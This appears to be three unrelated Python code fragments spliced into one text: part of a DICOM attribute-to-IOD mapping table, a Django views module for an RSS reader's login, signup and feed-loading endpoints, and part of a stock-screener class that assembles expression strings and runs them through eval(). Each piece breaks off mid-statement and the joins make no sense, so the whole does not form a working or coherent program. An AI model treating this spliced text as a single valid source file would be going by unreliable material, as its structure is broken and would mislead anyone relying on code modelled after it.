'SPATIAL FIDUCIALS IOD': ['Series'],
'RT ION PLAN IOD': ['Series'],
'X-RAY ANGIOGRAPHIC IMAGE IOD': ['Series'],
'CT IMAGE IOD': ['Series'],
'VL WHOLE SLIDE MICROSCOPY IOD': ['Series'],
'RT ION BEAMS TREATMENT RECORD IOD': ['Series'],
'OPHTHALMIC VISUAL FIELD STATIC PERIMETRY MEASUREMENTS IOD': ['Series'],
'XA/XRF GRAYSCALE SOFTCOPY PRESENTATION STATE IOD': ['Series'],
'RT DOSE IOD': ['Series'],
'AMBULATORY ECG IOD': ['Series'],
'SURFACE SEGMENTATION IOD': ['Series'],
'MAMMOGRAPHY CAD SR IOD': ['Series'],
'VL MICROSCOPIC IMAGE IOD': ['Series'],
'RT BEAMS TREATMENT RECORD IOD': ['Series'],
'DEFORMABLE SPATIAL REGISTRATION IOD': ['Series'],
'VIDEO PHOTOGRAPHIC IMAGE IOD': ['Series'],
'RT IMAGE IOD': ['Series'],
'SC IMAGE IOD': ['Series'],
None: ['Series'],
'SEGMENTATION IOD': ['Series'],
'PET IMAGE IOD': ['Series'],
'PSEUDO-COLOR SOFTCOPY PRESENTATION STATE IOD': ['Series'],
'DIGITAL X-RAY IMAGE IOD': ['Series'],
'REAL WORLD VALUE MAPPING IOD': ['Series'],
'SPATIAL REGISTRATION IOD': ['Series'],
'COLON CAD SR IOD': ['Series'],
'INTRAVASCULAR OCT IMAGE IOD': ['Series'],
'COLOR SOFTCOPY PRESENTATION STATE IOD': ['Series'],
'GRAYSCALE SOFTCOPY PRESENTATION STATE IOD': ['Series'],
'ENHANCED PET IMAGE IOD': ['Series'],
'VISUAL ACUITY MEASUREMENTS IOD': ['Series'],
'US MULTI-FRAME IMAGE IOD': ['Series'],
'ENHANCED X-RAY RF IMAGE IOD': ['Series'],
'RT BEAMS DELIVERY INSTRUCTION IOD': ['Series'],
'SUBJECTIVE REFRACTION MEASUREMENTS IOD': ['Series'],
'US IMAGE IOD': ['Series'],
'GENERAL ECG IOD': ['Series'],
'XRF IMAGE IOD': ['Series'],
'ENCAPSULATED CDA IOD': ['Series'],
'ENHANCED SR IOD': ['Series'],
'VL PHOTOGRAPHIC IMAGE IOD': ['Series'],
'GENERAL AUDIO WAVEFORM IOD': ['Series'],
'MR IMAGE IOD': ['Series'],
'OPHTHALMIC TOMOGRAPHY IMAGE IOD': ['Series'],
'VIDEO ENDOSCOPIC IMAGE IOD': ['Series'],
'ARTERIAL PULSE WAVEFORM IOD': ['Series'],
},
# ClinicalTrialSeriesDescription
0x00120072L: {
'BASIC STRUCTURED DISPLAY IOD': ['Series'],
'MULTI-FRAME TRUE COLOR SC IMAGE IOD': ['Series'],
'RT BRACHY TREATMENT RECORD IOD': ['Series'],
'RT STRUCTURE SET IOD': ['Series'],
'RT PLAN IOD': ['Series'],
'CR IMAGE IOD': ['Series'],
'RAW DATA IOD': ['Series'],
'MACULAR GRID THIICKNESS AND VOLUME REPORT IOD': ['Series'],
'ENHANCED MR IMAGE IOD': ['Series'],
'BASIC CARDIAC EP IOD': ['Series'],
'RT TREATMENT SUMMARY RECORD IOD': ['Series'],
'12-LEAD ECG IOD': ['Series'],
'RESPIRATORY WAVEFORM IOD': ['Series'],
'VL SLIDE-COORDINATES MICROSCOPIC IMAGE IOD': ['Series'],
'BREAST TOMOSYNTHESIS IMAGE IOD': ['Series'],
'BASIC VOICE AUDIO IOD': ['Series'],
'OPHTHALMIC PHOTOGRAPHY 16 BIT IMAGE IOD': ['Series'],
'ENHANCED X-RAY ANGIOGRAPHIC IMAGE IOD': ['Series'],
'OPHTHALMIC PHOTOGRAPHY 8 BIT IMAGE IOD': ['Series'],
'MULTI-FRAME GRAYSCALE WORD SC IMAGE IOD': ['Series'],
'SPECTACLE PRESCIPTION REPORT IOD': ['Series'],
'BASIC TEXT SR IOD': ['Series'],
'NM IMAGE IOD': ['Series'],
'BLENDING SOFTCOPY PRESENTATION STATE IOD': ['Series'],
'LENSOMETRY MEASUREMENTS IOD': ['Series'],
'MR SPECTROSCOPY IOD': ['Series'],
'ENCAPSULATED PDF IOD': ['Series'],
'X-RAY 3D ANGIOGRAPHIC IMAGE IOD': ['Series'],
'CHEST CAD SR IOD': ['Series'],
'HEMODYNAMIC IOD': ['Series'],
'OPHTHALMIC AXIAL MEASUREMENTS IOD': ['Series'],
'DIGITAL MAMMOGRAPHY X-RAY IMAGE IOD': ['Series'],
'VIDEO MICROSCOPIC IMAGE IOD': ['Series'],
'ENHANCED MR COLOR IMAGE IOD': ['Series'],
'ENHANCED CT IMAGE IOD': ['Series'],
'X-RAY RADIATION DOSE SR IOD': ['Series'],
'AUTOREFRACTION MEASUREMENTS IOD': ['Series'],
'PROCEDURE LOG IOD': ['Series'],
'IMPLANTATION PLAN SR DOCUMENT IOD': ['Series'],
'DIGITAL INTRA-ORAL X-RAY IMAGE IOD': ['Series'],
'STEREOMETRIC RELATIONSHIP IOD': ['Series'],
'INTRAOCULAR LENS CALCULATIONS IOD': ['Series'],
'X-RAY 3D CRANIOFACIAL IMAGE IOD': ['Series'],
'VL ENDOSCOPIC IMAGE IOD': ['Series'],
'KERATOMETRY MEASUREMENTS IOD': ['Series'],
'MULTI-FRAME SINGLE BIT SC IMAGE IOD': ['Series'],
'MULTI-FRAME GRAYSCALE BYTE SC IMAGE IOD': ['Series'],
'COMPREHENSIVE SR IOD': ['Series'],
'ENHANCED ULTRASOUND VOLUME IOD': ['Series'],
'KEY OBJECT SELECTION DOCUMENT IOD': ['Series'],
'SPATIAL FIDUCIALS IOD': ['Series'],
'RT ION PLAN IOD': ['Series'],
'X-RAY ANGIOGRAPHIC IMAGE IOD': ['Series'],
'CT IMAGE IOD': ['Series'],
'VL WHOLE SLIDE MICROSCOPY IOD': ['Series'],
'RT ION BEAMS TREATMENT RECORD IOD': ['Series'],
'OPHTHALMIC VISUAL FIELD STATIC PERIMETRY MEASUREMENTS IOD': ['Series'],
'XA/XRF GRAYSCALE SOFTCOPY PRESENTATION STATE IOD': ['Series'],
'RT DOSE IOD': ['Series'],
'AMBULATORY ECG IOD': ['Series'],
'SURFACE SEGMENTATION IOD': ['Series'],
'MAMMOGRAPHY CAD SR IOD': ['Series'],
'VL MICROSCOPIC IMAGE IOD': ['Series'],
'RT BEAMS TREATMENT RECORD IOD': ['Series'],
'DEFORMABLE SPATIAL REGISTRATION IOD': ['Series'],
'VIDEO PHOTOGRAPHIC IMAGE IOD': ['Series'],
'RT IMAGE IOD': ['Series'],
'SC IMAGE IOD': ['Series'],
None: ['Series'],
'SEGMENTATION IOD': ['Series'],
'PET IMAGE IOD': ['Series'],
'PSEUDO-COLOR SOFTCOPY PRESENTATION STATE IOD': ['Series'],
'DIGITAL X-RAY IMAGE IOD': ['Series'],
'REAL WORLD VALUE MAPPING IOD': ['Series'],
'SPATIAL REGISTRATION IOD': ['Series'],
'COLON CAD SR IOD': ['Series'],
'INTRAVASCULAR OCT IMAGE IOD': ['Series'],
'COLOR SOFTCOPY PRESENTATION STATE IOD': ['Series'],
'GRAYSCALE SOFTCOPY PRESENTATION STATE IOD': ['Series'],
'ENHANCED PET IMAGE IOD': ['Series'],
'VISUAL ACUITY MEASUREMENTS IOD': ['Series'],
'US MULTI-FRAME IMAGE IOD': ['Series'],
'ENHANCED X-RAY RF IMAGE IOD': ['Series'],
'RT BEAMS DELIVERY INSTRUCTION IOD': ['Series'],
'SUBJECTIVE REFRACTION MEASUREMENTS IOD': ['Series'],
'US IMAGE IOD': ['Series'],
'GENERAL ECG IOD': ['Series'],
'XRF IMAGE IOD': ['Series'],
'ENCAPSULATED CDA IOD': ['Series'],
'ENHANCED SR IOD': ['Series'],
'VL PHOTOGRAPHIC IMAGE IOD': ['Series'],
'GENERAL AUDIO WAVEFORM IOD': ['Series'],
'MR IMAGE IOD': ['Series'],
'OPHTHALMIC TOMOGRAPHY IMAGE IOD': ['Series'],
'VIDEO ENDOSCOPIC IMAGE IOD': ['Series'],
'ARTERIAL PULSE WAVEFORM IOD': ['Series'],
},
# InstanceNumber
0x00200013L: {
'HANGING PROTOCOL IOD': ['Hanging Protocol'],
'BASIC STRUCTURED DISPLAY IOD': ['Presentation State'],
'MULTI-FRAME TRUE COLOR SC IMAGE IOD': ['Image'],
'RT BRACHY TREATMENT RECORD IOD': ['Treatment Record'],
'RT ION MACHINE VERIFICATION IOD': ['Rt Ion Machine Verification'],
'RT STRUCTURE SET IOD': ['Structure Set'],
'RT PLAN IOD': ['Plan'],
'FILM SESSION IOD': ['Film Session'],
'BASIC FILM BOX IOD': ['Basic Film Box'],
'CR IMAGE IOD': ['Image'],
'RAW DATA IOD': ['Raw Data'],
'MACULAR GRID THIICKNESS AND VOLUME REPORT IOD': ['Document'],
'ENHANCED MR IMAGE IOD': ['Image'],
'UNIFIED PROCEDURE STEP IOD': ['Unified Procedure Step'],
'BASIC CARDIAC EP IOD': ['Waveform'],
'RT TREATMENT SUMMARY RECORD IOD': ['Treatment Record'],
'MODALITY PERFORMED PROCEDURE STEP IOD': ['Modality Performed Procedure Step'],
'12-LEAD ECG IOD': ['Waveform'],
'RESPIRATORY WAVEFORM IOD': ['Waveform'],
'VL SLIDE-COORDINATES MICROSCOPIC IMAGE IOD': ['Image'],
'BREAST TOMOSYNTHESIS IMAGE IOD': ['Image'],
'BASIC VOICE AUDIO IOD': ['Waveform'],
'OPHTHALMIC PHOTOGRAPHY 16 BIT IMAGE IOD': ['Image'],
'ENHANCED X-RAY ANGIOGRAPHIC IMAGE IOD': ['Image'],
'OPHTHALMIC PHOTOGRAPHY 8 BIT IMAGE IOD': ['Image'],
'COLOR PALETTE IOD': ['Color Palette'],
'MULTI-FRAME GRAYSCALE WORD SC IMAGE IOD': ['Image'],
'SPECTACLE PRESCIPTION REPORT IOD': ['Document'],
'BASIC TEXT SR IOD': ['Document'],
'NM IMAGE IOD': ['Image'],
'BLENDING SOFTCOPY PRESENTATION STATE IOD': ['Presentation State'],
'LENSOMETRY MEASUREMENTS IOD': ['Equipment'],
'MR SPECTROSCOPY IOD': ['Equipment'],
'ENCAPSULATED PDF IOD': ['Encapsulated Document'],
'X-RAY 3D ANGIOGRAPHIC IMAGE IOD': ['Image'],
'CHEST CAD SR IOD': ['Document'],
'HEMODYNAMIC IOD': ['Waveform'],
'OPHTHALMIC AXIAL MEASUREMENTS IOD': ['Equipment'],
'DIGITAL MAMMOGRAPHY X-RAY IMAGE IOD': ['Image'],
'VIDEO MICROSCOPIC IMAGE IOD': ['Image'],
'ENHANCED MR COLOR IMAGE IOD': ['Image'],
'INSTANCE AVAILABILITY NOTIFICATION IOD': ['Instance Availability Notification'],
'X-RAY RADIATION DOSE SR IOD': ['Document'],
'AUTOREFRACTION MEASUREMENTS IOD': ['Equipment'],
'GENERIC IMPLANT TEMPLATE IOD': ['Implant Template'],
'IMPLANTATION PLAN SR DOCUMENT IOD': ['Document'],
'SPATIAL REGISTRATION IOD': ['Spatial Registration'],
'ENHANCED X-RAY RF IMAGE IOD': ['Image'],
'INTRAOCULAR LENS CALCULATIONS IOD': ['Equipment'],
'X-RAY 3D CRANIOFACIAL IMAGE IOD': ['Image'],
'VL ENDOSCOPIC IMAGE IOD': ['Image'],
'KERATOMETRY MEASUREMENTS IOD': ['Equipment'],
'MULTI-FRAME SINGLE BIT SC IMAGE IOD': ['Image'],
'MULTI-FRAME GRAYSCALE BYTE SC IMAGE IOD': ['Image'],
'COMPREHENSIVE SR IOD': ['Document'],
'ENHANCED ULTRASOUND VOLUME IOD': ['Image'],
'KEY OBJECT SELECTION DOCUMENT IOD': ['Series', 'Document'],
'SPATIAL FIDUCIALS IOD': ['Spatial Fiducials'],
'RT ION PLAN IOD': ['Plan'],
'X-RAY ANGIOGRAPHIC IMAGE IOD': ['Image'],
'CT IMAGE IOD': ['Image'],
'ENHANCED CT IMAGE IOD': ['Image'],
'PRINT JOB IOD': ['Print Job'],
'RT CONVENTIONAL MACHINE VERIFICATION IOD': ['Rt Conventional Machine Verification'],
'VL WHOLE SLIDE MICROSCOPY IOD': ['Image'],
'RT ION BEAMS TREATMENT RECORD IOD': ['Treatment Record'],
'OPHTHALMIC VISUAL FIELD STATIC PERIMETRY MEASUREMENTS IOD': ['Measurements'],
'XA/XRF GRAYSCALE SOFTCOPY PRESENTATION STATE IOD': ['Presentation State'],
'RT DOSE IOD': ['Dose'],
'BASIC ANNOTATION BOX IOD': ['Basic Annotation Box'],
'GENERAL PURPOSE PERFORMED PROCEDURE STEP IOD': ['General Purpose Performed Procedure Step'],
'AMBULATORY ECG IOD': ['Waveform'],
'PRINTER IOD': ['Printer'],
'PRINTER CONFIGURATION IOD': ['Printer Configuration'],
'SURFACE SEGMENTATION IOD': ['Surface'],
'MAMMOGRAPHY CAD SR IOD': ['Document'],
'VL MICROSCOPIC IMAGE IOD': ['Image'],
'RT BEAMS TREATMENT RECORD IOD': ['Treatment Record'],
'DEFORMABLE SPATIAL REGISTRATION IOD': ['Deformable Registration'],
'IMPLANT ASSEMBLY TEMPLATE | |
<gh_stars>1-10
import datetime
import time
import boto
import redis
import requests
import random
import zlib
from django.shortcuts import get_object_or_404
from django.shortcuts import render
from django.contrib.auth.decorators import login_required
from django.template.loader import render_to_string
from django.db import IntegrityError
from django.db.models import Q
from django.views.decorators.cache import never_cache
from django.core.urlresolvers import reverse
from django.contrib.auth import login as login_user
from django.contrib.auth import logout as logout_user
from django.contrib.auth.models import User
from django.http import HttpResponse, HttpResponseRedirect, HttpResponseForbidden, Http404, UnreadablePostError
from django.conf import settings
from django.core.mail import mail_admins
#from django.core.validators import email_re
from django.core.validators import EmailValidator
from django.core.exceptions import ValidationError
from django.core.validators import validate_email
from django.core.mail import EmailMultiAlternatives
from django.contrib.sites.models import Site
from django.utils import feedgenerator
from django.utils.encoding import smart_unicode
from mongoengine.queryset import OperationError
from mongoengine.queryset import NotUniqueError
from apps.recommendations.models import RecommendedFeed
from apps.analyzer.models import MClassifierTitle, MClassifierAuthor, MClassifierFeed, MClassifierTag
from apps.analyzer.models import apply_classifier_titles, apply_classifier_feeds
from apps.analyzer.models import apply_classifier_authors, apply_classifier_tags
from apps.analyzer.models import get_classifiers_for_user, sort_classifiers_by_feed
from apps.profile.models import Profile
from apps.reader.models import UserSubscription, UserSubscriptionFolders, RUserStory, Feature
from apps.reader.forms import SignupForm, LoginForm, FeatureForm
from apps.rss_feeds.models import MFeedIcon, MStarredStoryCounts
from apps.search.models import MUserSearch
from apps.statistics.models import MStatistics
# from apps.search.models import SearchStarredStory
try:
from apps.rss_feeds.models import Feed, MFeedPage, DuplicateFeed, MStory, MStarredStory
except:
pass
from apps.social.models import MSharedStory, MSocialProfile, MSocialServices
from apps.social.models import MSocialSubscription, MActivity, MInteraction
from apps.categories.models import MCategory
from apps.social.views import load_social_page
from apps.rss_feeds.tasks import ScheduleImmediateFetches
from utils import json_functions as json
from utils.user_functions import get_user, ajax_login_required
from utils.feed_functions import relative_timesince
from utils.story_functions import format_story_link_date__short
from utils.story_functions import format_story_link_date__long
from utils.story_functions import strip_tags
from utils import log as logging
from utils.view_functions import get_argument_or_404, render_to, is_true
from utils.view_functions import required_params
from utils.ratelimit import ratelimit
from vendor.timezones.utilities import localtime_for_timezone
BANNED_URLS = [
"brentozar.com",
]
@never_cache
@render_to('reader/dashboard.xhtml')
def index(request, **kwargs):
if request.method == "GET" and request.subdomain and request.subdomain not in ['dev', 'www', 'debug']:
username = request.subdomain
if '.' in username:
username = username.split('.')[0]
user = User.objects.filter(username=username)
if not user:
user = User.objects.filter(username__iexact=username)
if user:
user = user[0]
if not user:
return HttpResponseRedirect('http://%s%s' % (
Site.objects.get_current().domain,
reverse('index')))
return load_social_page(request, user_id=user.pk, username=request.subdomain, **kwargs)
if request.user.is_anonymous():
return welcome(request, **kwargs)
else:
return dashboard(request, **kwargs)
def dashboard(request, **kwargs):
user = request.user
feed_count = UserSubscription.objects.filter(user=request.user).count()
recommended_feeds = RecommendedFeed.objects.filter(is_public=True,
approved_date__lte=datetime.datetime.now()
).select_related('feed')[:2]
unmoderated_feeds = []
if user.is_staff:
unmoderated_feeds = RecommendedFeed.objects.filter(is_public=False,
declined_date__isnull=True
).select_related('feed')[:2]
statistics = MStatistics.all()
social_profile = MSocialProfile.get_user(user.pk)
start_import_from_google_reader = request.session.get('import_from_google_reader', False)
if start_import_from_google_reader:
del request.session['import_from_google_reader']
if not user.is_active:
url = "https://%s%s" % (Site.objects.get_current().domain,
reverse('stripe-form'))
return HttpResponseRedirect(url)
logging.user(request, "~FBLoading dashboard")
return {
'user_profile' : user.profile,
'feed_count' : feed_count,
'account_images' : range(1, 4),
'recommended_feeds' : recommended_feeds,
'unmoderated_feeds' : unmoderated_feeds,
'statistics' : statistics,
'social_profile' : social_profile,
'start_import_from_google_reader': start_import_from_google_reader,
'debug' : settings.DEBUG,
}, "reader/dashboard.xhtml"
def welcome(request, **kwargs):
user = get_user(request)
statistics = MStatistics.all()
social_profile = MSocialProfile.get_user(user.pk)
if request.method == "POST":
if request.POST.get('submit', '').startswith('log'):
login_form = LoginForm(request.POST, prefix='login')
signup_form = SignupForm(prefix='signup')
else:
login_form = LoginForm(prefix='login')
signup_form = SignupForm(request.POST, prefix='signup')
else:
login_form = LoginForm(prefix='login')
signup_form = SignupForm(prefix='signup')
logging.user(request, "~FBLoading welcome")
return {
'user_profile' : hasattr(user, 'profile') and user.profile,
'login_form' : login_form,
'signup_form' : signup_form,
'statistics' : statistics,
'social_profile' : social_profile,
'post_request' : request.method == 'POST',
}, "reader/welcome.xhtml"
@never_cache
def login(request):
code = -1
message = ""
if request.method == "POST":
form = LoginForm(request.POST, prefix='login')
if form.is_valid():
login_user(request, form.get_user())
if request.POST.get('api'):
logging.user(form.get_user(), "~FG~BB~SKiPhone Login~FW")
code = 1
else:
logging.user(form.get_user(), "~FG~BBLogin~FW")
return HttpResponseRedirect(reverse('index'))
else:
message = form.errors.items()[0][1][0]
if request.POST.get('api'):
return HttpResponse(json.encode(dict(code=code, message=message)), content_type='application/json')
else:
return index(request)
@never_cache
def signup(request):
if request.method == "POST":
form = SignupForm(prefix='signup', data=request.POST)
if form.is_valid():
new_user = form.save()
login_user(request, new_user)
logging.user(new_user, "~FG~SB~BBNEW SIGNUP: ~FW%s" % new_user.email)
if not new_user.is_active:
url = "https://%s%s" % (Site.objects.get_current().domain,
reverse('stripe-form'))
return HttpResponseRedirect(url)
return index(request)
@never_cache
def logout(request):
logging.user(request, "~FG~BBLogout~FW")
logout_user(request)
if request.GET.get('api'):
return HttpResponse(json.encode(dict(code=1)), content_type='application/json')
else:
return HttpResponseRedirect(reverse('index'))
def autologin(request, username, secret):
next = request.GET.get('next', '')
if not username or not secret:
return HttpResponseForbidden()
profile = Profile.objects.filter(user__username=username, secret_token=secret)
if not profile:
return HttpResponseForbidden()
user = profile[0].user
user.backend = settings.AUTHENTICATION_BACKENDS[0]
login_user(request, user)
logging.user(user, "~FG~BB~SKAuto-Login. Next stop: %s~FW" % (next if next else 'Homepage',))
if next and not next.startswith('/'):
next = '?next=' + next
return HttpResponseRedirect(reverse('index') + next)
elif next:
return HttpResponseRedirect(next)
else:
return HttpResponseRedirect(reverse('index'))
@ratelimit(minutes=1, requests=60)
@never_cache
@json.json_view
def load_feeds(request):
user = get_user(request)
feeds = {}
include_favicons = request.REQUEST.get('include_favicons', False)
flat = request.REQUEST.get('flat', False)
update_counts = request.REQUEST.get('update_counts', False)
version = int(request.REQUEST.get('v', 1))
if include_favicons == 'false': include_favicons = False
if update_counts == 'false': update_counts = False
if flat == 'false': flat = False
if flat: return load_feeds_flat(request)
try:
folders = UserSubscriptionFolders.objects.get(user=user)
except UserSubscriptionFolders.DoesNotExist:
data = dict(feeds=[], folders=[])
return data
except UserSubscriptionFolders.MultipleObjectsReturned:
UserSubscriptionFolders.objects.filter(user=user)[1:].delete()
folders = UserSubscriptionFolders.objects.get(user=user)
user_subs = UserSubscription.objects.select_related('feed').filter(user=user)
day_ago = datetime.datetime.now() - datetime.timedelta(days=1)
scheduled_feeds = []
for sub in user_subs:
pk = sub.feed_id
if update_counts and sub.needs_unread_recalc:
sub.calculate_feed_scores(silent=True)
feeds[pk] = sub.canonical(include_favicon=include_favicons)
if not sub.active: continue
if not sub.feed.active and not sub.feed.has_feed_exception:
scheduled_feeds.append(sub.feed.pk)
elif sub.feed.active_subscribers <= 0:
scheduled_feeds.append(sub.feed.pk)
elif sub.feed.next_scheduled_update < day_ago:
scheduled_feeds.append(sub.feed.pk)
if len(scheduled_feeds) > 0 and request.user.is_authenticated():
logging.user(request, "~SN~FMTasking the scheduling immediate fetch of ~SB%s~SN feeds..." %
len(scheduled_feeds))
ScheduleImmediateFetches.apply_async(kwargs=dict(feed_ids=scheduled_feeds, user_id=user.pk))
starred_counts, starred_count = MStarredStoryCounts.user_counts(user.pk, include_total=True)
if not starred_count and len(starred_counts):
starred_count = MStarredStory.objects(user_id=user.pk).count()
social_params = {
'user_id': user.pk,
'include_favicon': include_favicons,
'update_counts': update_counts,
}
social_feeds = MSocialSubscription.feeds(**social_params)
social_profile = MSocialProfile.profile(user.pk)
social_services = MSocialServices.profile(user.pk)
categories = None
if not user_subs:
categories = MCategory.serialize()
logging.user(request, "~FB~SBLoading ~FY%s~FB/~FM%s~FB feeds/socials%s" % (
len(feeds.keys()), len(social_feeds), '. ~FCUpdating counts.' if update_counts else ''))
data = {
'feeds': feeds.values() if version == 2 else feeds,
'social_feeds': social_feeds,
'social_profile': social_profile,
'social_services': social_services,
'user_profile': user.profile,
"is_staff": user.is_staff,
'user_id': user.pk,
'folders': json.decode(folders.folders),
'starred_count': starred_count,
'starred_counts': starred_counts,
'categories': categories
}
return data
@json.json_view
def load_feed_favicons(request):
user = get_user(request)
feed_ids = request.REQUEST.getlist('feed_ids')
if not feed_ids:
user_subs = UserSubscription.objects.select_related('feed').filter(user=user, active=True)
feed_ids = [sub['feed__pk'] for sub in user_subs.values('feed__pk')]
feed_icons = dict([(i.feed_id, i.data) for i in MFeedIcon.objects(feed_id__in=feed_ids)])
return feed_icons
def load_feeds_flat(request):
user = request.user
include_favicons = is_true(request.REQUEST.get('include_favicons', False))
update_counts = is_true(request.REQUEST.get('update_counts', True))
include_inactive = is_true(request.REQUEST.get('include_inactive', False))
feeds = {}
inactive_feeds = {}
day_ago = datetime.datetime.now() - datetime.timedelta(days=1)
scheduled_feeds = []
iphone_version = "2.1" # Preserved forever. Don't change.
latest_ios_build = "52"
latest_ios_version = "5.0.0b2"
if include_favicons == 'false': include_favicons = False
if update_counts == 'false': update_counts = False
if not user.is_authenticated():
return HttpResponseForbidden()
try:
folders = UserSubscriptionFolders.objects.get(user=user)
except UserSubscriptionFolders.DoesNotExist:
folders = []
user_subs = UserSubscription.objects.select_related('feed').filter(user=user, active=True)
if not user_subs and folders:
folders.auto_activate()
user_subs = UserSubscription.objects.select_related('feed').filter(user=user, active=True)
if include_inactive:
inactive_subs = UserSubscription.objects.select_related('feed').filter(user=user, active=False)
for sub in user_subs:
if update_counts and sub.needs_unread_recalc:
sub.calculate_feed_scores(silent=True)
feeds[sub.feed_id] = sub.canonical(include_favicon=include_favicons)
if not sub.feed.active and not sub.feed.has_feed_exception:
scheduled_feeds.append(sub.feed.pk)
elif sub.feed.active_subscribers <= 0:
scheduled_feeds.append(sub.feed.pk)
elif sub.feed.next_scheduled_update < day_ago:
scheduled_feeds.append(sub.feed.pk)
if include_inactive:
for sub in inactive_subs:
inactive_feeds[sub.feed_id] = sub.canonical(include_favicon=include_favicons)
if len(scheduled_feeds) > 0 and request.user.is_authenticated():
logging.user(request, "~SN~FMTasking the scheduling immediate fetch of ~SB%s~SN feeds..." %
len(scheduled_feeds))
ScheduleImmediateFetches.apply_async(kwargs=dict(feed_ids=scheduled_feeds, user_id=user.pk))
flat_folders = []
flat_folders_with_inactive = []
if folders:
flat_folders = folders.flatten_folders(feeds=feeds)
flat_folders_with_inactive = folders.flatten_folders(feeds=feeds,
inactive_feeds=inactive_feeds)
social_params = {
'user_id': user.pk,
'include_favicon': include_favicons,
'update_counts': update_counts,
}
social_feeds = MSocialSubscription.feeds(**social_params)
social_profile = MSocialProfile.profile(user.pk)
social_services = MSocialServices.profile(user.pk)
starred_counts, starred_count = MStarredStoryCounts.user_counts(user.pk, include_total=True)
if not starred_count and len(starred_counts):
starred_count = MStarredStory.objects(user_id=user.pk).count()
categories = None
if not user_subs:
categories = MCategory.serialize()
logging.user(request, "~FB~SBLoading ~FY%s~FB/~FM%s~FB/~FR%s~FB feeds/socials/inactive ~FMflat~FB%s" % (
len(feeds.keys()), len(social_feeds), len(inactive_feeds), '. ~FCUpdating counts.' if update_counts else ''))
data = {
"flat_folders": flat_folders,
"flat_folders_with_inactive": flat_folders_with_inactive,
"feeds": feeds if not include_inactive else {"0": "Don't include `include_inactive=true` if you want active feeds."},
"inactive_feeds": inactive_feeds if include_inactive else {"0": "Include `include_inactive=true`"},
"social_feeds": social_feeds,
"social_profile": social_profile,
"social_services": social_services,
"user": user.username,
"user_id": user.pk,
"is_staff": user.is_staff,
"user_profile": user.profile,
"iphone_version": iphone_version,
"latest_ios_build": latest_ios_build,
"latest_ios_version": latest_ios_version,
"categories": categories,
'starred_count': starred_count,
'starred_counts': starred_counts,
'share_ext_token': user.profile.secret_token,
}
return data
@ratelimit(minutes=1, requests=10)
@never_cache
@json.json_view
def refresh_feeds(request):
start = datetime.datetime.now()
user = get_user(request)
feed_ids = request.REQUEST.getlist('feed_id')
check_fetch_status = request.REQUEST.get('check_fetch_status')
favicons_fetching = request.REQUEST.getlist('favicons_fetching')
social_feed_ids = [feed_id for feed_id in feed_ids if 'social:' in feed_id]
feed_ids = list(set(feed_ids) - set(social_feed_ids))
feeds = {}
if feed_ids or (not social_feed_ids and not feed_ids):
feeds = UserSubscription.feeds_with_updated_counts(user, feed_ids=feed_ids,
check_fetch_status=check_fetch_status)
checkpoint1 = datetime.datetime.now()
social_feeds = {}
if social_feed_ids or (not social_feed_ids and not feed_ids):
social_feeds = MSocialSubscription.feeds_with_updated_counts(user, social_feed_ids=social_feed_ids)
checkpoint2 = datetime.datetime.now()
favicons_fetching = [int(f) for f in favicons_fetching if f]
feed_icons = {}
if favicons_fetching:
feed_icons = dict([(i.feed_id, i) for i in MFeedIcon.objects(feed_id__in=favicons_fetching)])
for feed_id, feed in feeds.items():
if feed_id in favicons_fetching and feed_id in feed_icons:
feeds[feed_id]['favicon'] = feed_icons[feed_id].data
feeds[feed_id]['favicon_color'] = feed_icons[feed_id].color
feeds[feed_id]['favicon_fetching'] = feed.get('favicon_fetching')
user_subs = UserSubscription.objects.filter(user=user, active=True).only('feed')
sub_feed_ids = [s.feed_id for s | |
if results[k] is None:
results[k] = True
if v[0] == 6: #'reached high/low'
if v[3] is None:
v[3] = 1
period = getOffset(v[2].strip().lower(), v[1][0])
name = v[1][0] + ' ' + v[1][1]
for i in range(1, v[3]+1):
if indicators[name] is None or len(indicators[name]) <= i+period:
results[k] = False
break
value1 = getIndicatorValue(indicators, v[1], i)
value2 = [getIndicatorValue(indicators, v[1], i+j) for j in range(period)]
if 'high' in v[2]:
result = (value1 >= max(value2))
else:
result = (value1 <= min(value2))
if result:
results[k] = True
break
if results[k] is None:
results[k] = False
if v[0] == 99: #formed Candlestick Pattern
name = v[2]
if 'candlestick pattern' in name:
isPatternFound = False
sortedByRankMap = sorted(cp_mapping.items(), key=lambda x: x[1][2])
if name == 'bullish candlestick pattern':
cs_patterns = (kc.lower() for kc,vc in sortedByRankMap if len(vc[0]) > 0 and vc[1] > 0)
elif name == 'bearish candlestick pattern':
cs_patterns = (kc.lower() for kc,vc in sortedByRankMap if len(vc[0]) > 0 and vc[1] < 0)
else:
cs_patterns = (kc.lower() for kc,vc in sortedByRankMap if len(vc[0]) > 0 and vc[1] == 0)
for cs_pattern in cs_patterns: #sorted by performance rank
isPatternFound = isCandlestickPatternFound(cs_pattern, v[3], dataframe[v[1]], cp_mapping)
if isPatternFound:
break
results[k] = isPatternFound
else:
results[k] = isCandlestickPatternFound(name, v[3], dataframe[v[1]], cp_mapping)
#logger.debug(k + ' = ' + str(results[k]))
except Exception as e:
logger.error(f'{symbol[0]}: {traceback.format_exc()}')
return None
return results
@staticmethod
def sceener(symbol, expression, timeframes, translation):
utils.engine.dispose()
result = False
results = MyScreener.getResults(symbol, timeframes, translation)
logger.debug(results)
if len(translation) == 1 and list(translation.values())[0][0] in [7, 8]:
return results
if results is not None:
#logger.debug('expression: ' + expression)
newexpression = expression
for k, v in results.items():
newexpression = newexpression.replace(k, str(v))
newexpression = newexpression.replace('[', '(').replace(']', ')').replace('\r', ' ').replace('\n', ' ')
#logger.debug('newexpression: ' + newexpression)
try:
result = eval(newexpression)
except Exception as e:
logger.error(f'{newexpression}: {traceback.format_exc()}')
return None
logger.debug(f'{symbol}: {str(result)}')
return symbol if result else None
@staticmethod
def calculateIndicator(timeframe, function, dataframe):
np.seterr(all='warn')
if function.lower() in ['open', 'high', 'low', 'close', 'volume']:
return (function, dataframe[timeframe][function])
i = function.find('(')
name = function[:i]
parameters = function[i+1:]
result = None
for k, v in TA_MAPPING.items():
if name.lower() == k:
x = v[0] + '('
for j in range(1, len(v)-1):
x += "dataframe['" + timeframe + "']['" + v[j] + "'],"
if len(parameters) > 1:
key = name.lower()
if 'macd' in key: #swap 1st and 2nd arguments for MACD to conform to the usual order of parameters
parameters = parameters[:-1].split(',')
if key == 'macd':
x += parameters[1] + ',' + parameters[0] + ')'
else:
x += parameters[1] + ',' + parameters[0] + ',' + parameters[2] + ')'
else:
x += parameters
else:
x = x[:-1] + ')'
#print(x)
try:
result = eval(x)
except Exception as e:
logger.error(f'{x}: {traceback.format_exc()}')
